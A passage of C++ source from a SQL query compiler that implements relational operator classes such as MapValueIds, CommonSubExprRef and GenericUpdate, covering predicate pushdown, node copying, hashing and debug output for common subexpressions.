equals predicate // when we do the actual rewrite below map_.addMapEntry(g, eqPred->getValueId()); } } else { // Don't push down VEGPredicates on columns that are // characteristic outputs of the MapValueIds. Those // predicates (or their equivalents) should have // already been pushed down. ValueIdSet vegMembers(veg->getAllValues()); vegMembers += vegRef; vegMembers.intersectSet( getGroupAttr()->getCharacteristicOutputs()); if (!vegMembers.isEmpty()) { // a VEGPred on one of my characteristic outputs, // assume that my child tree already has the // associated VEGPreds and remove this predicate // silently predicatesOnParent -= g; } // else leave the predicate and let the code below deal // with it, this will probably end up in a failed assert // below for predsRewrittenForChild.isEmpty() } } } // rewrite the predicates so they can be applied in the child node getMap().rewriteValueIdSetDown(predicatesOnParent,predsRewrittenForChild); // use the standard method with the new required values RelExpr::pushdownCoveredExpr(outputValues, newExternalInputs, predsRewrittenForChild, &requiredValues, childIndex); // eliminate any VEGPredicates that got duplicated in the parent if (NOT child(0)->isCutOp()) predsRewrittenForChild -= child(0)->selectionPred(); // all predicates must have been pushed down!! CMPASSERT(predsRewrittenForChild.isEmpty()); predicatesOnParent.clear(); // Remove entries from the map that are no longer required since // they no longer appear in the outputs. NABoolean matchWithTopValues = FALSE; if (child(0)->isCutOp() || child(0)->getOperatorType() == REL_FILTER || child(0)->getOperatorType() == REL_MAP_VALUEIDS ) { matchWithTopValues = TRUE; getMap().removeUnusedEntries(getGroupAttr()->getCharacteristicOutputs(), matchWithTopValues); } else { getMap().removeUnusedEntries(child(0)->getGroupAttr()->getCharacteristicOutputs(), matchWithTopValues); } } // MapValueIds::pushdownCoveredExpr void MapValueIds::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); // // The output of the MapValueId is given by the ValueIds // contained in the "upper" portion of a two-tiered mapping // table. // outputValues.insertList((getMap2()).getTopValues()); } // MapValueIds::getPotentialOutputValues() void MapValueIds::addSameMapEntries(const ValueIdSet & newTopBottomValues) { for (ValueId x = newTopBottomValues.init(); newTopBottomValues.next(x); newTopBottomValues.advance(x)) addMapEntry(x,x); } void MapValueIds::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { xlist.insert(map_.getTopValues().rebuildExprTree(ITM_ITEM_LIST)); llist.insert("upper_values"); xlist.insert(map_.getBottomValues().rebuildExprTree(ITM_ITEM_LIST)); llist.insert("lower_values"); RelExpr::addLocalExpr(xlist,llist); } HashValue MapValueIds::topHash() { HashValue result = RelExpr::topHash(); result ^= map_.getTopValues(); result ^= map_.getBottomValues(); return result; } NABoolean MapValueIds::duplicateMatch(const RelExpr & other) const { if (NOT RelExpr::duplicateMatch(other)) return FALSE; MapValueIds &o = (MapValueIds &) other; if (includesFavoriteMV_ != o.includesFavoriteMV_) return FALSE; if (cseRef_ != o.cseRef_) return FALSE; if (map_ != o.map_) return FALSE; return TRUE; } RelExpr * MapValueIds::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { MapValueIds *result; if (derivedNode == NULL) result = new (outHeap) MapValueIds(NULL,map_,outHeap); else result = static_cast<MapValueIds*>(derivedNode); result->includesFavoriteMV_ = includesFavoriteMV_; result->cseRef_ = cseRef_; return RelExpr::copyTopNode(result, outHeap); } const NAString MapValueIds::getText() const { return "map_value_ids"; // return "expr"; } // ----------------------------------------------------------------------- // Member functions for class PhysicalMapValueIds // ----------------------------------------------------------------------- NABoolean PhysicalMapValueIds::isLogical() const { return FALSE; } NABoolean PhysicalMapValueIds::isPhysical() const { return TRUE; } // ----------------------------------------------------------------------- // Member functions for class Describe // ----------------------------------------------------------------------- RelExpr * Describe::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Describe *result; if (derivedNode == NULL) result = new (outHeap) Describe(originalQuery_, getDescribedTableName(), format_, labelAnsiNameSpace_); else result = (Describe *) derivedNode; return RelExpr::copyTopNode(result, outHeap); } const NAString Describe::getText() const { return "describe"; } // ----------------------------------------------------------------------- // Member functions for class ProbeCache // ----------------------------------------------------------------------- NABoolean ProbeCache::isLogical() const { return FALSE; } NABoolean ProbeCache::isPhysical() const { return TRUE; } Int32 ProbeCache::getArity() const { return 1; } RelExpr * ProbeCache::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { ProbeCache *result; if (derivedNode == NULL) result = new (outHeap) ProbeCache(NULL, numCachedProbes_, outHeap); else result = (ProbeCache *) derivedNode; result->numCachedProbes_ = numCachedProbes_; result->numInnerTuples_ = numInnerTuples_; return RelExpr::copyTopNode(result, outHeap); } const NAString ProbeCache::getText() const { return "probe_cache"; } // ----------------------------------------------------------------------- // Member functions for class ControlRunningQuery // ----------------------------------------------------------------------- NABoolean ControlRunningQuery::isLogical() const { return TRUE; } NABoolean ControlRunningQuery::isPhysical() const { return TRUE; } Int32 ControlRunningQuery::getArity() const { return 0; } RelExpr * ControlRunningQuery::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { ControlRunningQuery *result = NULL; if (derivedNode == NULL) { switch (qs_) { case ControlNidPid: result = new (outHeap) ControlRunningQuery(nid_, pid_, ControlNidPid, action_, forced_, outHeap); break; case ControlPname: result = new (outHeap) ControlRunningQuery(pname_, ControlPname, action_, forced_, outHeap); break; case ControlQid: result = new (outHeap) ControlRunningQuery(queryId_, ControlQid, action_, forced_, outHeap); break; default: CMPASSERT(0); } result->setComment(comment_); } else result = (ControlRunningQuery *) derivedNode; return RelExpr::copyTopNode(result, outHeap); } const NAString ControlRunningQuery::getText() const { return "control_running_query"; } void ControlRunningQuery::setComment(NAString &comment) { NAString cancelComment (comment, CmpCommon::statementHeap()); comment_ = cancelComment; } // ----------------------------------------------------------------------- // member functions for class CSEInfo (helper for CommonSubExprRef) // ----------------------------------------------------------------------- Int32 CSEInfo::getTotalNumRefs(Int32 restrictToSingleConsumer) const { // shortcut for main query if (cseId_ == CmpStatement::getCSEIdForMainQuery()) return 1; // Calculate how many times we will evaluate this common subexpression // at runtime: // - If the CSE is shared then we evaluate it once // - Otherwise, look at the consumers that are lexical refs // (avoid double-counting refs from multiple copies of a parent) // and add the times they are being executed. Int32 result = 0; NABoolean sharedConsumers = FALSE; LIST(CountedCSEInfo) countsByCSE(CmpCommon::statementHeap()); CollIndex minc = 0; CollIndex maxc = consumers_.entries(); if (restrictToSingleConsumer >= 0) { // count only the executions resulting from a single consumer minc = restrictToSingleConsumer; maxc = minc + 1; } // loop over all consumers or look at just one for (CollIndex c=minc; c<maxc; c++) { if (isShared(c)) { sharedConsumers = TRUE; } else { CommonSubExprRef *consumer = getConsumer(c); CSEInfo *parentInfo = CmpCommon::statement()->getCSEInfoById( consumer->getParentCSEId()); NABoolean duplicateDueToSharedConsumer = FALSE; // Don't double-count consumers that originate from the // same parent CSE, have the same lexical ref number from // the parent, and are shared. if (parentInfo->isShared( consumer->getParentConsumerId())) { for (CollIndex d=0; d<countsByCSE.entries(); d++) if (countsByCSE[d].getInfo() == parentInfo && countsByCSE[d].getLexicalCount() == consumer->getLexicalRefNumFromParent()) { duplicateDueToSharedConsumer = TRUE; break; } // First consumer from this parent CSE with this lexical // ref number, remember that we are going to count // it. Note that we are use the lexical ref "count" in // CountedCSEInfo as the lexical ref number in this // method, so the name "count" means "ref number" in // this context. if (!duplicateDueToSharedConsumer) countsByCSE.insert( CountedCSEInfo( parentInfo, consumer->getLexicalRefNumFromParent())); } // parent consumer is shared if (!duplicateDueToSharedConsumer) { // recursively determine number of times the parent of // this consumer gets executed result += parentInfo->getTotalNumRefs( consumer->getParentConsumerId()); } } // consumer is not shared } // loop over consumer(s) if (sharedConsumers) // all the shared consumers are handled by evaluating the CSE once result++; return result; } CSEInfo::CSEAnalysisOutcome CSEInfo::getAnalysisOutcome(Int32 id) const { if (idOfAnalyzingConsumer_ != id && analysisOutcome_ == CREATE_TEMP) // only the analyzing consumer creates and reads the temp, the // others only read it return TEMP; else return analysisOutcome_; } Int32 CSEInfo::addChildCSE(CSEInfo *childInfo, NABoolean addLexicalRef) { Int32 result = -1; CollIndex foundIndex = NULL_COLL_INDEX; // look for an existing entry for (CollIndex i=0; i<childCSEs_.entries() && foundIndex == NULL_COLL_INDEX; i++) if (childCSEs_[i].getInfo() == childInfo) foundIndex = i; if (foundIndex == NULL_COLL_INDEX) { // create a new entry foundIndex = childCSEs_.entries(); childCSEs_.insert(CountedCSEInfo(childInfo)); } if (addLexicalRef) { // The return value for a lexical ref is the count of lexical // refs for this particular parent/child CSE relationship so far // (0 if this is the first one). Note that we can't say anything // abount counts for expanded refs at this time, those will be // handled later, during the transform phase of the normalizer. result = childCSEs_[foundIndex].getLexicalCount(); childCSEs_[foundIndex].incrementLexicalCount(); } return result; } void CSEInfo::addCSERef(CommonSubExprRef *cse) { CMPASSERT(name_ == cse->getName()); cse->setId(consumers_.entries()); consumers_.insert(cse); if (cse->isALexicalRef()) numLexicalRefs_++; } void CSEInfo::replaceConsumerWithAnAlternative(CommonSubExprRef *c) { Int32 idToReplace = c->getId(); if (consumers_[idToReplace] != c) { CollIndex foundPos = alternativeConsumers_.index(c); CMPASSERT(foundPos != NULL_COLL_INDEX); CMPASSERT(consumers_[idToReplace]->getOriginalRef() == c->getOriginalRef()); // c moves from the list of copies to the real list and another // consumer moves the opposite way alternativeConsumers_.removeAt(foundPos); alternativeConsumers_.insert(consumers_[idToReplace]); consumers_[idToReplace] = c; } } // ----------------------------------------------------------------------- // member functions for class CommonSubExprRef // ----------------------------------------------------------------------- NABoolean CommonSubExprRef::isAChildOfTheMainQuery() const { return (parentCSEId_ == CmpStatement::getCSEIdForMainQuery()); } CommonSubExprRef::~CommonSubExprRef() { } Int32 CommonSubExprRef::getArity() const { // always return 1 for now, that may change in the future return 1; } void CommonSubExprRef::addToCmpStatement(NABoolean lexicalRef) { NABoolean alreadySeen = TRUE; // look up whether a CSE with this name already exists CSEInfo *info = CmpCommon::statement()->getCSEInfo(internalName_); // sanity check, make sure that the caller knows whether this is a // lexical ref (generated with CommonSubExprRef constructor) or an // expanded ref (generated with CommonSubExprRef::copyTopNode() // before the bind phase) CMPASSERT(isALexicalRef() == lexicalRef); if (!info) { // make a new object to hold a list of all references // to this CSE (the first one of them will be "this") info = new(CmpCommon::statementHeap()) CSEInfo(internalName_, CmpCommon::statementHeap()); alreadySeen = FALSE; } info->addCSERef(this); if (!alreadySeen) CmpCommon::statement()->addCSEInfo(info); } void CommonSubExprRef::addParentRef(CommonSubExprRef *parentRef) { // Establish the parent/child relationship between two // CommonSubExprRef nodes, or between the main query and a // CommonSubExprRef node (parentRef == NULL). Also, record // the dependency between parent and child CSEs in the lexical // dependency multigraph. Bookkeeping to do: // // - Add the child's CSE to the list of child CSEs of the // parent CSE // - Set the data members in the child ref that point to the // parent CSE and parent ref // parent info is for a parent CSE or for the main query CSEInfo *parentInfo = (parentRef ? CmpCommon::statement()->getCSEInfo(parentRef->getName()) : CmpCommon::statement()->getCSEInfoForMainQuery()); CSEInfo *childInfo = CmpCommon::statement()->getCSEInfo(getName()); CMPASSERT(parentInfo && childInfo); // Update the lexical CSE multigraph, and also return the // count of previously existing edges in the graph. // LexicalRefNumFromParent is set to a positive value only for // lexical refs, the other refs will be handled later, in the SQO // phase. This is since expanded refs may be processed before their // lexical ref and we may not know this value yet. lexicalRefNumFromParent_ = parentInfo->addChildCSE(childInfo, isALexicalRef()); parentCSEId_ = parentInfo->getCSEId(); if (parentRef) parentRefId_ = parentRef->getId(); else parentRefId_ = -1; // main query does not have a CommonSubExprRef } NABoolean CommonSubExprRef::isFirstReference() const { return (CmpCommon::statement()->getCSEInfo(internalName_) == NULL); } void CommonSubExprRef::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (NOT columnList_.isEmpty()) { xlist.insert(columnList_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("column_list"); } if(NOT pushedPredicates_.isEmpty()) { xlist.insert(pushedPredicates_.rebuildExprTree()); llist.insert("pushed_predicates"); } } HashValue CommonSubExprRef::topHash() { HashValue result = RelExpr::topHash(); result ^= internalName_; result ^= id_; result ^= columnList_; result ^= pushedPredicates_; return result; } NABoolean CommonSubExprRef::duplicateMatch(const RelExpr & other) const { if (NOT RelExpr::duplicateMatch(other)) return FALSE; const CommonSubExprRef &o = static_cast<const CommonSubExprRef &>(other); return (internalName_ == o.internalName_ && id_ == o.id_ && columnList_ == o.columnList_ && pushedPredicates_ == o.pushedPredicates_); } RelExpr * CommonSubExprRef::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { CommonSubExprRef *result = NULL; if (derivedNode == NULL) result = new (outHeap) CommonSubExprRef(NULL, internalName_.data(), outHeap); else result = static_cast<CommonSubExprRef *>(derivedNode); // copy fields that are common for bound and unbound nodes result->hbAccessOptionsFromCTE_ = hbAccessOptionsFromCTE_; if (nodeIsBound()) { // if the node is bound, we assume that the copy is serving the same function // as the original, as an alternative, create an "alternative ref" result->setId(id_); result->parentCSEId_ = parentCSEId_; result->parentRefId_ = parentRefId_; result->lexicalRefNumFromParent_ = lexicalRefNumFromParent_; result->columnList_ = columnList_; result->nonVEGColumns_ = nonVEGColumns_; result->commonInputs_ = commonInputs_; result->pushedPredicates_ = pushedPredicates_; result->nonSharedPredicates_ = nonSharedPredicates_; result->cseEstLogProps_ = cseEstLogProps_; // don't copy the tempScan_ // Mark this as an alternative ref, not that this does not // change the status of lexical vs. expanded ref result->isAnExpansionOf_ = isAnExpansionOf_; result->isAnAlternativeOf_ = ( isAnAlternativeOf_ ? isAnAlternativeOf_ : this); CmpCommon::statement()->getCSEInfo(internalName_)-> registerAnAlternativeConsumer(result); } else { // If the node is not bound, we assume that we created an // "expanded" reference to a common subexpression in a tree that // itself is a reference to a CTE (Common Table Expression). // See the comment in RelMisc.h for method isAnExpandedRef() // to explain the term "expanded" ref. result->isAnExpansionOf_ = (isAnExpansionOf_ ? isAnExpansionOf_ : this); result->addToCmpStatement(FALSE); } return result; } const NAString CommonSubExprRef::getText() const { NAString result("cse "); char buf[20]; result += ToAnsiIdentifier(internalName_); snprintf(buf, sizeof(buf), " %d", id_); result += buf; return result; } Union * CommonSubExprRef::makeUnion(RelExpr *lc, RelExpr *rc, NABoolean blocked) { // Make a regular or blocked union with no characteristic outputs Union *result; ValueIdSet newInputs(lc->getGroupAttr()->getCharacteristicInputs()); result = new(CmpCommon::statementHeap()) Union(lc, rc); newInputs += rc->getGroupAttr()->getCharacteristicInputs(); result->setGroupAttr(new (CmpCommon::statementHeap()) GroupAttributes()); result->getGroupAttr()->addCharacteristicInputs(newInputs); if(blocked) result->setBlockedUnion(); return result; } void CommonSubExprRef::display() { if (isAChildOfTheMainQuery()) printf("Parent: main query, lexical ref %d\n", lexicalRefNumFromParent_); else printf("Parent: %s(consumer %d, lexical ref %d)\n", CmpCommon::statement()->getCSEInfoById( parentCSEId_)->getName().data(), parentRefId_, lexicalRefNumFromParent_); printf("Original columns:\n"); columnList_.display(); printf("\nCommon inputs:\n"); commonInputs_.display(); printf("\nPushed predicates:\n"); pushedPredicates_.display(); printf("\nNon shared preds to be applied to scan:\n"); nonSharedPredicates_.display(); printf("\nPotential values for VEG rewrite:\n"); nonVEGColumns_.display(); } void CommonSubExprRef::displayAll(const char *optionalId) { const LIST(CSEInfo *) *cses = CmpCommon::statement()->getCSEInfoList(); if (cses) for (CollIndex i=0; i<cses->entries(); i++) if (!optionalId || strlen(optionalId) == 0 || cses->at(i)->getName() == optionalId) { CSEInfo *info = cses->at(i); CollIndex nc = info->getNumConsumers(); NABoolean isMainQuery = (info->getCSEId() == CmpStatement::getCSEIdForMainQuery()); if (isMainQuery) { printf("\n\n==========================\n"); printf("MainQuery:\n"); } else { printf("\n\n==========================\n"); printf("CSE: %s (%d consumers, %d lexical ref(s), %d total execution(s))\n", info->getName().data(), nc, info->getNumLexicalRefs(), info->getTotalNumRefs()); } const LIST(CountedCSEInfo) &children(info->getChildCSEs()); for (CollIndex j=0; j<children.entries(); j++) printf(" references CSE: %s %d times\n", children[j].getInfo()->getName().data(), children[j].getLexicalCount()); if (info->getIdOfAnalyzingConsumer() >= 0) { const char *outcome = "?"; ValueIdList cols; CommonSubExprRef *consumer = info->getConsumer(info->getIdOfAnalyzingConsumer()); const ValueIdList &cCols(consumer->getColumnList()); switch (info->getAnalysisOutcome(0)) { case CSEInfo::UNKNOWN_ANALYSIS: outcome = "UNKNOWN"; break; case CSEInfo::EXPAND: outcome = "EXPAND"; break; case CSEInfo::CREATE_TEMP: outcome = "CREATE_TEMP"; break; case CSEInfo::TEMP: outcome = "TEMP"; break; case CSEInfo::ERROR: outcome = "ERROR"; break; default: outcome = "???"; break; } printf(" analyzed by consumer %d, outcome: %s\n", info->getIdOfAnalyzingConsumer(), outcome); makeValueIdListFromBitVector( cols, cCols, info->getNeededColumns()); printf("\n columns of temp table:\n"); cols.display(); printf("\n commonPredicates:\n"); info->getCommonPredicates().display(); if (info->getVEGRefsWithDifferingConstants().entries() > 0) { printf("\n vegRefsWithDifferingConstants:\n"); info->getVEGRefsWithDifferingConstants().display(); } if (info->getVEGRefsWithDifferingInputs().entries() > 0) { printf("\n vegRefsWithDifferingInputs:\n"); info->getVEGRefsWithDifferingInputs().display(); } if (info->getCSETreeKeyColumns().entries() > 0) { ValueIdList keyCols; makeValueIdListFromBitVector( keyCols, cCols, info->getCSETreeKeyColumns()); printf("\n CSE key columns:\n"); keyCols.display(); } printf("\n DDL of temp table:\n%s\n", info->getTempTableDDL().data()); } // analyzed else if (info->getAnalysisOutcome(0) == CSEInfo::ELIMINATED_IN_BINDER) printf(" eliminated in the binder\n"); else if (!isMainQuery) printf(" not yet analyzed\n"); for (int c=0; c<nc; c++) { printf("\n\n----- Consumer %d:\n", c); info->getConsumer(c)->display(); } } // a CSE we want to display } void CommonSubExprRef::makeValueIdListFromBitVector(ValueIdList &tgt, const ValueIdList &src, const NABitVector &vec) { for (CollIndex b=0; vec.nextUsed(b); b++) tgt.insert(src[b]); } // ----------------------------------------------------------------------- // member functions for class GenericUpdate // ----------------------------------------------------------------------- GenericUpdate::~GenericUpdate() {} Int32 GenericUpdate::getArity() const { if (getOperator().match(REL_ANY_LEAF_GEN_UPDATE)) return 0; else if (getOperator().match(REL_ANY_UNARY_GEN_UPDATE)) return 1; else ABORT("Don't know opcode in GenericUpdate::getArity()"); return 0; // return makes MSVC happy. } void GenericUpdate::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues = potentialOutputs_; if (producedMergeIUDIndicator_ != NULL_VALUE_ID) outputValues += producedMergeIUDIndicator_; } const NAString GenericUpdate::getUpdTableNameText() const { return updatedTableName_.getTextWithSpecialType(); } void GenericUpdate::computeUsedCols() { ValueIdSet requiredValueIds(newRecExpr_); ValueIdSet coveredExprs; // --------------------------------------------------------------------- // Call the "coverTest" method, offering it all the index columns // as additional inputs. "coverTest" will mark those index columns that // it actually needs to satisfy the required value ids, and that is // what we actually want. The actual cover test should always succeed, // otherwise the update node would have been inconsistent. // --------------------------------------------------------------------- // use the clustering index, unless set otherwise if (indexDesc_ == NULL) indexDesc_ = getTableDesc()->getClusteringIndex(); if (isMerge()) { requiredValueIds.insertList(mergeInsertRecExpr_); } requiredValueIds.insertList(beginKeyPred_); requiredValueIds.insertList(endKeyPred_); requiredValueIds.insertList(getCheckConstraints()); // QSTUFF requiredValueIds.insertList(newRecBeforeExpr_); // QSTUFF getGroupAttr()->coverTest(requiredValueIds, indexDesc_->getIndexColumns(), // all index columns coveredExprs, // dummy parameter usedColumns_); // needed index cols // usedColumns_ is now set correctly } // GenericUpdate::computeUsedCols const NAString GenericUpdate::getText() const { return ("GenericUpdate " + getUpdTableNameText()); } HashValue GenericUpdate::topHash() { HashValue result = RelExpr::topHash(); result ^= newRecExpr_; if (isMerge()) result ^= mergeInsertRecExpr_; // result ^= keyExpr_; return result; } NABoolean GenericUpdate::duplicateMatch(const RelExpr & other) const { if (NOT RelExpr::duplicateMatch(other)) return FALSE; GenericUpdate &o = (GenericUpdate &) other; if (newRecExpr_ != o.newRecExpr_ OR (isMerge() && ((mergeInsertRecExpr_ != o.mergeInsertRecExpr_) OR (mergeUpdatePred_ != o.mergeUpdatePred_)) ) OR NOT (beginKeyPred_ == o.beginKeyPred_) OR NOT (endKeyPred_ == o.endKeyPred_)) return FALSE; // later, replace this with the getTableDesc() ??? if (NOT (updatedTableName_ == o.updatedTableName_)) return FALSE; if (mtsStatement_ != o.mtsStatement_) return FALSE; if (noRollback_ != o.noRollback_) return FALSE; if (avoidHalloweenR2_ != o.avoidHalloweenR2_) return FALSE; if (avoidHalloween_ != o.avoidHalloween_) return FALSE; if (halloweenCannotUseDP2Locks_ != o.halloweenCannotUseDP2Locks_) return FALSE; return TRUE; } RelExpr * GenericUpdate::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { GenericUpdate *result; if (derivedNode == NULL) result = new (outHeap) GenericUpdate(updatedTableName_, getTableDesc(), getOperatorType(), NULL, NULL, NULL, outHeap); else result = (GenericUpdate *) derivedNode; result->setIndexDesc((IndexDesc *)getIndexDesc()); if (newRecExprTree_) result->newRecExprTree_ = newRecExprTree_->copyTree(outHeap)->castToItemExpr(); // ## Should usedColumns_ be copied here? Is it missing deliberately or only by mistake? result->updateToSelectMap_ = updateToSelectMap_; result->newRecExpr_ = newRecExpr_; result->newRecExprArray_ = newRecExprArray_; // QSTUFF result->newRecBeforeExpr_ = newRecBeforeExpr_; result->newRecBeforeExprArray_ = newRecBeforeExprArray_; // QSTUFF result->mergeInsertRecExpr_ = mergeInsertRecExpr_; result->mergeInsertRecExprArray_ = mergeInsertRecExprArray_; result->mergeUpdatePred_ = mergeUpdatePred_; result->beginKeyPred_ = beginKeyPred_; result->endKeyPred_ = endKeyPred_; result->executorPred_ = executorPred_; result->potentialOutputs_ = potentialOutputs_; result->indexNewRecExprArrays_ = indexNewRecExprArrays_; result->indexBeginKeyPredArray_ = indexBeginKeyPredArray_; result->indexEndKeyPredArray_ = indexEndKeyPredArray_; result->indexNumberArray_ = indexNumberArray_; result->scanIndexDesc_ = scanIndexDesc_; result->accessOptions_ = accessOptions_; result->checkConstraints_ = checkConstraints_; result->rowsAffected_ = rowsAffected_; result->setOptStoi(stoi_); result->setNoFlow(noFlow_); result->setMtsStatement(mtsStatement_); result->setNoRollbackOperation(noRollback_); result->setAvoidHalloweenR2(avoidHalloweenR2_); result->avoidHalloween_ = avoidHalloween_; result->halloweenCannotUseDP2Locks_ = halloweenCannotUseDP2Locks_; result->setIsMergeUpdate(isMergeUpdate_); result->setIsMergeDelete(isMergeDelete_); result->subqInUpdateAssign_ = subqInUpdateAssign_; result->setUpdateCKorUniqueIndexKey(updateCKorUniqueIndexKey_); result->hbaseOper() = hbaseOper(); result->uniqueHbaseOper() = uniqueHbaseOper(); result->cursorHbaseOper() = cursorHbaseOper(); result->uniqueRowsetHbaseOper() = uniqueRowsetHbaseOper(); result->canDoCheckAndUpdel() = canDoCheckAndUpdel(); result->setNoCheck(noCheck()); result->noDTMxn() = noDTMxn(); result->useMVCC() = useMVCC(); result->useSSCC() = useSSCC(); if (currOfCursorName()) result->currOfCursorName_ = currOfCursorName()->copyTree(outHeap)->castToItemExpr(); if (preconditionTree_) result->preconditionTree_ = preconditionTree_->copyTree(outHeap)->castToItemExpr(); result->setPrecondition(precondition_); result->exprsInDerivedClasses_ = exprsInDerivedClasses_; result->producedMergeIUDIndicator_ = producedMergeIUDIndicator_; result->referencedMergeIUDIndicator_ = referencedMergeIUDIndicator_; return RelExpr::copyTopNode(result, outHeap); } PlanPriority GenericUpdate::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { PlanPriority result; NABoolean interactiveAccess = (CmpCommon::getDefault(INTERACTIVE_ACCESS) == DF_ON) OR ( QueryAnalysis::Instance() AND QueryAnalysis::Instance()->optimizeForFirstNRows()); return result; } void GenericUpdate::addNewRecExprTree(ItemExpr *expr) { ExprValueId newRec = newRecExprTree_; ItemExprTreeAsList(&newRec, ITM_AND).insert(expr); newRecExprTree_ = newRec.getPtr(); } ItemExpr * GenericUpdate::removeNewRecExprTree() { ItemExpr * result = newRecExprTree_; newRecExprTree_ = NULL; return result; } void GenericUpdate::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (newRecExprTree_ != NULL OR NOT newRecExpr_.isEmpty()) { if (newRecExpr_.isEmpty()) xlist.insert(newRecExprTree_); else xlist.insert(newRecExpr_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("new_rec_expr"); } if ((isMerge()) && (NOT mergeInsertRecExpr_.isEmpty())) { xlist.insert(mergeInsertRecExpr_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("merge_insert_rec_expr"); } if ((isMerge()) && (NOT mergeUpdatePred_.isEmpty())) { xlist.insert(mergeUpdatePred_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("merge_update_where_pred"); } Int32 indexNo = 0; for(; indexNo < (Int32)indexNewRecExprArrays_.entries(); indexNo++) { ValueIdArray array = indexNewRecExprArrays_[indexNo]; ValueIdList list; for(Int32 i = 0; i < (Int32)array.entries(); i++) list.insert(array[i]); xlist.insert(list.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("new idx rec expr"); } if (executorPredTree_ != NULL OR NOT executorPred_.isEmpty()) { if (executorPred_.isEmpty()) xlist.insert(executorPredTree_); else xlist.insert(executorPred_.rebuildExprTree()); llist.insert("predicate"); } // display preds from search key only if begin/end keys are // not generated yet (e.g. during optimization) if (beginKeyPred_.isEmpty() AND endKeyPred_.isEmpty() AND pathKeys_ AND NOT pathKeys_->getKeyPredicates().isEmpty()) { xlist.insert(pathKeys_->getKeyPredicates().rebuildExprTree()); if (pathKeys_ == partKeys_) llist.insert("key_and_part_key_preds"); else llist.insert("key_predicates"); } // display part key preds only if different from clustering key preds if (partKeys_ AND pathKeys_ != partKeys_ AND NOT partKeys_->getKeyPredicates().isEmpty()) { xlist.insert(partKeys_->getKeyPredicates().rebuildExprTree()); llist.insert("part_key_predicates"); } if (NOT beginKeyPred_.isEmpty()) { xlist.insert(beginKeyPred_.rebuildExprTree(ITM_AND)); llist.insert("begin_key"); } for(indexNo = 0; indexNo < (Int32)indexBeginKeyPredArray_.entries(); indexNo++){ if(NOT indexBeginKeyPredArray_[indexNo].isEmpty()) { xlist.insert(indexBeginKeyPredArray_[indexNo] .rebuildExprTree(ITM_ITEM_LIST)); llist.insert("index_begin_key"); } } if (NOT endKeyPred_.isEmpty()) { xlist.insert(endKeyPred_.rebuildExprTree(ITM_AND)); llist.insert("end_key"); } for(indexNo = 0; indexNo < (Int32)indexEndKeyPredArray_.entries(); indexNo++) { if(NOT indexEndKeyPredArray_[indexNo].isEmpty()) { xlist.insert(indexEndKeyPredArray_[indexNo] .rebuildExprTree(ITM_ITEM_LIST)); llist.insert("index_end_key"); } } if (NOT getCheckConstraints().isEmpty()) { xlist.insert(getCheckConstraints().rebuildExprTree(ITM_AND)); llist.insert("check_constraint"); } if (preconditionTree_ != NULL OR precondition_.entries() > 0) { if (preconditionTree_ != NULL) xlist.insert(preconditionTree_); else xlist.insert(precondition_.rebuildExprTree(ITM_AND)); llist.insert("precondition"); } RelExpr::addLocalExpr(xlist,llist); } NABoolean GenericUpdate::updateCurrentOf() { return currOfCursorName() != NULL #ifndef NDEBUG || getenv("FORCE_UPD_CURR_OF") #endif ; } //++MV - returns the GenericUpdateOutputFunction's that are in the // potential outputs NABoolean GenericUpdate::getOutputFunctionsForMV(ValueId &valueId, OperatorTypeEnum opType) const { const ValueIdSet& outputs = getGroupAttr()->getCharacteristicOutputs(); for (ValueId vid= outputs.init(); outputs.next(vid); outputs.advance(vid) ) { ItemExpr *expr = vid.getItemExpr(); if (expr->getOperatorType() == ITM_CAST) expr = expr->child(0); if (expr->getOperator().match(opType) && expr->isAGenericUpdateOutputFunction() ) { valueId = vid; return TRUE; } } return FALSE; } NABoolean GenericUpdate::computeRowsAffected() const { if (rowsAffected_ == GenericUpdate::COMPUTE_ROWSAFFECTED) return TRUE; else return FALSE; }; void GenericUpdate::configTSJforHalloween( Join* tsj, OperatorTypeEnum opType, CostScalar inputCardinality) { if (avoidHalloween()) { // If we use DP2's FELOCKSELF (i.e., DP2Locks) method to // protect against Halloween, then lock escalation will // be disabled in the Generator. So DP2 wants us to use // no more than 25000 locks per volume. // Also, notice that // by design, we are relying on good cardinality estimates. // If the estimates are too low, then there may be // runtime errors. const PartitioningFunction *partFunc = getTableDesc()-> getClusteringIndex()->getPartitioningFunction(); const Lng32 numParts = partFunc ? partFunc->getCountOfPartitions() : 1; const Lng32 maxLocksAllParts = 25000 * numParts; if ((opType == REL_LEAF_INSERT) && (inputCardinality < maxLocksAllParts) && ! getHalloweenCannotUseDP2Locks() && (CmpCommon::getDefault(BLOCK_TO_PREVENT_HALLOWEEN) != DF_ON) ) tsj->setHalloweenForceSort(Join::NOT_FORCED); else tsj->setHalloweenForceSort(Join::FORCED); } } void GenericUpdate::pushdownCoveredExpr(const ValueIdSet &outputExpr, const ValueIdSet &newExternalInputs, ValueIdSet &predicatesOnParent, const ValueIdSet *setOfValuesReqdByParent, Lng32 childIndex ) { // --------------------------------------------------------------------- // determine the set of local expressions that need to be evaluated // - assign expressions (reference source & target cols) // - source cols alone (in case order is required) // - characteristic outputs for this node // --------------------------------------------------------------------- // QSTUFF ?? again need to understand details ValueIdSet localExprs(newRecExpr()); if (setOfValuesReqdByParent) localExprs += *setOfValuesReqdByParent; // QSTUFF localExprs.insertList(newRecBeforeExpr()); // QSTUFF if (isMerge()) { localExprs.insertList(mergeInsertRecExpr()); } localExprs.insertList(beginKeyPred()); localExprs.insertList(updateToSelectMap().getBottomValues()); if (setOfValuesReqdByParent) localExprs += *setOfValuesReqdByParent ; localExprs += exprsInDerivedClasses_; // --------------------------------------------------------------------- // Check which expressions can be evaluated 